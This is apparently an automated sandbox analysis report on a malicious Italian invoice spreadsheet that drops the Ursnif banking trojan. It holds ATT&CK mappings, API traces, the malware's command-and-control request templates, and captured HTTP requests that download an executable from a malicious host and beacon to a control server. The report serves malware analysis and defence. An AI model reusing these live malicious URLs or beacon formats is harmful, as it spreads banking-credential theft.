Loading ...

Play interactive tourEdit tour

Analysis Report fattura_28.xls

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:225098
Start date:24.04.2020
Start time:11:14:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 20s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:fattura_28.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.bank.troj.spyw.expl.evad.winXLS@19/56@10/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 2.4% (good quality ratio 2.3%)
  • Quality average: 88.6%
  • Quality standard deviation: 19.4%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 99
  • Number of non-executed functions: 236
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 23.223.11.158, 204.79.197.200, 13.107.21.200, 104.72.180.62, 13.107.13.80, 2.20.143.30, 2.20.143.21, 205.185.216.10, 205.185.216.42, 8.248.117.254, 8.253.207.121, 8.238.29.254, 67.26.81.254, 67.26.137.254
  • Excluded domains from analysis (whitelisted): www.bing.com, e-0001.dc-msedge.net, dual-a-0001.a-msedge.net, api.bing.com, afd.e-0001.dc-msedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ncc.avast.com.edgesuite.net, e11290.dspg.akamaiedge.net, go.microsoft.com, any.edge.bing.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, ieonline.microsoft.com, a1488.dscd.akamai.net, api-bing-com.e-0001.e-msedge.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Hidden Macro 4.0 Gozi Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Software Packing21Credential Dumping1System Time Discovery1Remote File Copy12Man in the Browser1Data Encrypted1Remote File Copy12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting2Port MonitorsAccess Token Manipulation1Scripting2Network SniffingAccount Discovery1Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExecution through API3Accessibility FeaturesProcess Injection63Obfuscated Files or Information1Input CaptureFile and Directory Discovery5Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExploitation for Client Execution3System FirmwareDLL Search Order HijackingMasquerading1Credentials in FilesSystem Information Discovery35Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol12SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationGraphical User Interface1Shortcut ModificationFile System Permissions WeaknessValid Accounts1Account ManipulationVirtualization/Sandbox Evasion1Shared WebrootData StagedScheduled TransferConnection Proxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkCommand-Line Interface2Modify Existing ServiceNew ServiceVirtualization/Sandbox Evasion1Brute ForceProcess Discovery3Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskAccess Token Manipulation1Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection63Bash HistorySystem Owner/User Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessConnection Proxy1Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: sodxnes.exe.2164.2.memstrMalware Configuration Extractor: Ursnif {"server": "12", "version": "214131", "uptime": "352JJn", "crc": "3", "id": "8585", "user": "be6bfbbc04b2ebbcc45396fdb578e911", "soft": "3"}
Multi AV Scanner detection for domain / URLShow sources
Source: securezza.atVirustotal: Detection: 7%Perma Link
Source: line.monalisapizzeriasi.comVirustotal: Detection: 10%Perma Link
Source: http://gstat.hamiltoncustomhomesinc.com/fattura.exeVirustotal: Detection: 8%Perma Link
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 2.2.sodxnes.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00225632 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00225632
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05606656 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_05606656
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055F284E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_055F284E
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560DB2F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0560DB2F
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560B299 wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0560B299
Contains functionality to query local drivesShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05604342 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_05604342
Enumerates the file systemShow sources
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0ACGMOUV\fattura[1].exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\sodxnes.exeJump to behavior
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\ProgramData\sodxnes.exeJump to behavior

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Source: C:\ProgramData\sodxnes.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Found Tor onion addressShow sources
Source: sodxnes.exe, 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: sodxnes.exe, 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmpString found in binary or memory: vADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 24 Apr 2020 09:16:15 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Fri, 24 Apr 2020 09:15:01 GMTETag: "43000-5a405cccef818"Accept-Ranges: bytesContent-Length: 274432Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 a0 da 5b 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 78 01 00 00 ec 2c 04 00 00 00 00 f8 90 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2d 04 00 04 00 00 e3 f4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 d3 01 00 50 00 00 00 00 90 2c 04 f0 57 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 76 01 00 00 10 00 00 00 78 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 76 4e 00 00 00 90 01 00 00 50 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b4 ad 2a 04 00 e0 01 00 00 0c 01 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 57 01 00 00 90 2c 04 00 58 01 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0ACGMOUV\fattura[1].exeJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /fattura.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gstat.hamiltoncustomhomesinc.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/vt6G1XeymRxjyw99/uJu1Co0NCp8XDAF/A4EL32Pwn0gFTMv5l3/bFOIqzhKU/lZjwIJqkCLPIkMVk_2Bd/rDMu77T3mJGgIPn846n/xttes00EkSCsEPpEtL_2Fu/jmcYtdayneeAi/cIIG5lPJ/gomP_2FHyVudt9P/9.avi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: securezza.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: securezza.atConnection: Keep-AliveCookie: PHPSESSID=g1mogeufhv4lq8j34boptnth54; lang=en
Source: global trafficHTTP traffic detected: GET /images/n58fjtZhTCpMhOny/d_2F5nDeAbVbALK/_2FYd0KZgbPGjaCEmW/loCUkF_2F/0E54l0KaY43mbq2uSJ0J/Rwp8BS_2F_2ByLORkmc/KIDbs84xzxZKkuB8EvUNbN/ggFapaqXAKiQv/CZP_2F6q/BCNWGvtwCKrFjyF/QCcwrts.avi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: securezza.atConnection: Keep-AliveCookie: lang=en
Found strings which match to known social media urlsShow sources
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: gstat.hamiltoncustomhomesinc.com
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: sodxnes.exeString found in binary or memory: http://constitution.org/usdeclar.txt
Source: sodxnes.exe, 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
Source: sodxnes.exe, 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, sodxnes.exe, 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
